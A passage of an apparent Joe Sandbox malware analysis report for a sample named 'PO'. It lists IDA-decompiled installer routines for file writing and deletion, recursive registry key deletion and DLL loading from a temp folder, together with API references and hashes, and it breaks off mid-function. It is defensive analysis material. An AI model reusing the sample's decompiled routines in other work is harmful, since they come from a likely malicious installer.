0x1000232b
0x10002330
0x00000000
0x10002330

APIs

GlobalFree.KERNEL32(00000000), ref: 10002416

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000001.00000002.85191842667.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.85191813710.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191874016.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191898523.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_PO.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100024A9(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B9))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}

0x100024b3
0x100024b5
0x100024c4
0x100024ca
0x100024d7
0x100024d9
0x100024dd
0x100024dd
0x100024e5
0x100024eb
0x100024ed
0x00000000
0x100024f4
0x00000000
0x00000000
0x100024fa
0x00000000
0x00000000
0x10002504
0x00000000
0x00000000
0x1000250b
0x10002511
0x1000251d
0x10002523
0x10002528
0x00000000
0x00000000
0x1000254a
0x00000000
0x00000000
0x10002530
0x10002536
0x10002537
0x10002539
0x00000000
0x00000000
0x10002552
0x10002554
0x10002556
0x10002558
0x10002558
0x00000000
0x00000000
0x100024ed
0x1000255b
0x1000255b
0x10002560
0x10002572
0x10002572
0x10002578
0x1000257d
0x10002582
0x1000258e
0x10002593
0x00000000
0x10002598
0x10002584
0x10002585
0x10002599
0x10002599
0x10002582
0x1000259a
0x1000259e
0x100025a1
0x100025b8

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 10002572
GlobalFree.KERNEL32(00000000), ref: 100025AD

Memory Dump Source

Source File: 00000001.00000002.85191842667.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.85191813710.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191874016.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191898523.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_PO.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402840(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x48)) = 0xfffffd66;
				_t50 = E00402BBF(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405BA9(_t50) == 0) {
					E00402BBF(0xffffffed);
				}
				E00405D2E(_t50);
				_t26 = E00405D53(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a254;
					 *(_t56 - 8) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040336E(_t45);
						E00403358(_t49,  *(_t56 - 8));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x24));
						 *(_t56 - 0x34) = _t54;
						if(_t54 != _t45) {
							E004030E7(_t47,  *((intOrPtr*)(_t56 - 0x28)), _t45, _t54,  *(_t56 - 0x24));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x4c) =  *_t54;
								E00405D0E( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x4c);
							}
							GlobalFree( *(_t56 - 0x34));
						}
						E00405E05( *(_t56 + 8), _t49,  *(_t56 - 8));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x48)) = E004030E7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x48)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x00402840
0x00402842
0x0040284e
0x00402851
0x0040285b
0x0040285f
0x0040285f
0x00402865
0x00402872
0x0040287a
0x0040287d
0x00402883
0x00402891
0x00402896
0x0040289a
0x0040289d
0x004028a6
0x004028b2
0x004028b6
0x004028b9
0x004028c3
0x004028e2
0x004028ca
0x004028cf
0x004028d7
0x004028da
0x004028df
0x004028df
0x004028e9
0x004028e9
0x004028f6
0x004028fc
0x0040290e
0x0040290e
0x00402914
0x00402914
0x0040291f
0x00402920
0x00402924
0x00402928
0x0040292e
0x0040292e
0x00402935
0x004021dc
0x00402a4f
0x00402a5b

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 268536b817805fd7c6aa0ddf0c0313c96854f1d95891718e15f9d7c13f840f6f
Instruction ID: 9003099e8900d80eaa65f9bf21adae6f43ee9946aaa6f9d478ae9c17af360c06
Opcode Fuzzy Hash: 268536b817805fd7c6aa0ddf0c0313c96854f1d95891718e15f9d7c13f840f6f
Instruction Fuzzy Hash: D6216F72801118BBCF216FA5CE49D9E7F79EF09364F24423AF550762E0CB794E419B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404A99 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404A99(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004061A0(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004061A0(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004061A0(_t44, _t50, 0x423728, 0x423728, _a8);
				wsprintfW(_t34 + lstrlenW(0x423728) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429218, _a4, 0x423728);
			}

0x00404aa2
0x00404aa7
0x00404aaf
0x00404ab0
0x00404abd
0x00404ac5
0x00404ac6
0x00404ac8
0x00404aca
0x00404acc
0x00404acf
0x00404acf
0x00404ad6
0x00404adc
0x00404adc
0x00404ae3
0x00404aea
0x00404aed
0x00404af0
0x00404af0
0x00404af4
0x00404b04
0x00404b06
0x00404b09
0x00404ab2
0x00404ab2
0x00404ab9
0x00404ab9
0x00404b11
0x00404b1c
0x00404b32
0x00404b43
0x00404b5f

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-0042B000), ref: 00404B3A
wsprintfW.USER32 ref: 00404B43
SetDlgItemTextW.USER32(?,00423728), ref: 00404B56

Strings

%u.%u%s%s, xrefs: 00404B24
(7B, xrefs: 00404B2C

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
Instruction ID: 8555a1dc09e6b234f76c08cd80d60a8511de1cbf1cdbca66d7a603e4fd23a7b2
Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
Instruction Fuzzy Hash: E911EB736441283BDB0095AD9C45F9E3298DB85378F150237FA26F71D1DA79D82286EC

Uniqueness

Uniqueness Score: -1.00%

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402537(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t13;
				int _t16;
				int _t23;
				signed int _t28;
				intOrPtr* _t31;
				void* _t33;
				void* _t34;
				void* _t37;
				signed int _t39;

				_t31 = __esi;
				_t23 = __ebx;
				_t13 =  *(_t34 - 0x24);
				_t37 = __edx - 0x38;
				 *(_t34 - 0x34) = _t13;
				_t26 = 0 | _t37 == 0x00000000;
				_t28 = _t37 == 0;
				if(_t13 == __ebx) {
					if(__edx != 0x38) {
						_t16 = lstrlenW(E00402BBF(0x11)) + _t15;
					} else {
						E00402BBF(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsr9735.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsr9735.tmp\System.dll", 0x400, __ebx, __ebx);
						_t16 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsr9735.tmp\System.dll");
					}
				} else {
					E00402BA2(1);
					 *0x40add8 = __ax;
				}
				 *(_t34 + 8) = _t16;
				if( *_t31 == _t23) {
					L13:
					 *((intOrPtr*)(_t34 - 4)) = 1;
				} else {
					_t33 = E004060DE(_t26, _t31);
					if((_t28 |  *(_t34 - 0x34)) != 0 ||  *((intOrPtr*)(_t34 - 0x20)) == _t23 || E00405E34(_t33, _t33) >= 0) {
						_t13 = E00405E05(_t33, "C:\Users\Arthur\AppData\Local\Temp\nsr9735.tmp\System.dll",  *(_t34 + 8));
						_t39 = _t13;
						if(_t39 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t34 - 4));
				return 0;
			}

0x00402537
0x00402537
0x00402537
0x0040253c
0x0040253f
0x00402542
0x00402547
0x00402549
0x00402565
0x004025a3
0x00402567
0x00402569
0x00402583
0x0040258e
0x0040258e
0x0040254b
0x0040254d
0x00402552
0x0040255f
0x004025a8
0x004025ab
0x0040281e
0x0040281e
0x004025b1
0x004025ba
0x004025bc
0x004025db
0x004015ac
0x004015ae
0x00000000
0x004015b4
0x00000000
0x00000000
0x00000000
0x004025bc
0x00402a4f
0x00402a5b

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsr9735.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsr9735.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll, xrefs: 00402552, 00402575, 00402589, 004025D5
C:\Users\user\AppData\Local\Temp\nsr9735.tmp, xrefs: 0040257C

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsr9735.tmp$C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll
API String ID: 3109718747-2825876067
Opcode ID: bb355eb68794bd2602c597a740da7e4d176c02171e7b39124c1bbb2a5b8fb8b9
Instruction ID: 4789cac02ba757069cd1743e95fa376523a080456913a55bd7acca95e4ec0b97
Opcode Fuzzy Hash: bb355eb68794bd2602c597a740da7e4d176c02171e7b39124c1bbb2a5b8fb8b9
Instruction Fuzzy Hash: CA11E772A01204BADB10AFB18F4EE9E32659F54355F20403BF502F65C1DAFC8E51576E

Uniqueness

Uniqueness Score: -1.00%

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402BFF(void* _a4, short* _a8, intOrPtr _a12) {
				void* _v8;
				short _v532;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExW(_a4, _a8, 0,  *0x42a2f0 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402BFF(_v8,  &_v532, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406558(3);
					if(_t27 == 0) {
						if( *0x42a2f0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyW(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42a2f0, 0);
				}
				return _t18;
			}

0x00402c20
0x00402c28
0x00402c50
0x00402c3a
0x00402c8a
0x00402c90
0x00000000
0x00402c92
0x00402c4e
0x00000000
0x00000000
0x00402c4e
0x00402c65
0x00402c6d
0x00402c74
0x00402ca0
0x00000000
0x00000000
0x00402ca8
0x00402cb0
0x00000000
0x00000000
0x00000000
0x00402cb0
0x00000000
0x00402c83
0x00402c97

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
Instruction ID: b9f5b7c8593eadded22e2ca3cbb8d83d08b5e31647f9888e60cfbaa55d101d4e
Opcode Fuzzy Hash: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
Instruction Fuzzy Hash: 66116A71504119FFEF10AF90DF8CEAE3B79FB14384B10007AF905E11A0D7B58E55AA69

Uniqueness

Uniqueness Score: -1.00%

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x10001619
0x10001625
0x10001632
0x10001639
0x10001642
0x1000164e

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000001.00000002.85191842667.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.85191813710.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191874016.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191898523.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_PO.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CFA() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0xc),  *(_t27 - 0x28));
				GetClientRect(_t25, _t27 - 0x54);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402BBF(_t22), _t22,  *(_t27 - 0x4c) *  *(_t27 - 0x24),  *(_t27 - 0x48) *  *(_t27 - 0x24), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d06
0x00401d0d
0x00401d3c
0x00401d44
0x00401d4b
0x00401d4b
0x00402a4f
0x00402a5b

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: e9a49c003a36b0eb28a273a175e07ec8c4f33fa7e287ce0211e56fd96ac5525b
Instruction ID: c287ee2e14a47dfcdc45124cadc9b4dd0eb33b5564dd8f2f51e592e83ba53e14
Opcode Fuzzy Hash: e9a49c003a36b0eb28a273a175e07ec8c4f33fa7e287ce0211e56fd96ac5525b
Instruction Fuzzy Hash: 33F0E172600504AFD701DBE4DE88CEEBBBDEB48311B104476F541F51A1CA749D018B38

Uniqueness

Uniqueness Score: -1.00%

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BDF() {
				signed int _t28;
				WCHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x14) = E00402BA2(3);
				 *(_t55 + 8) = E00402BA2(4);
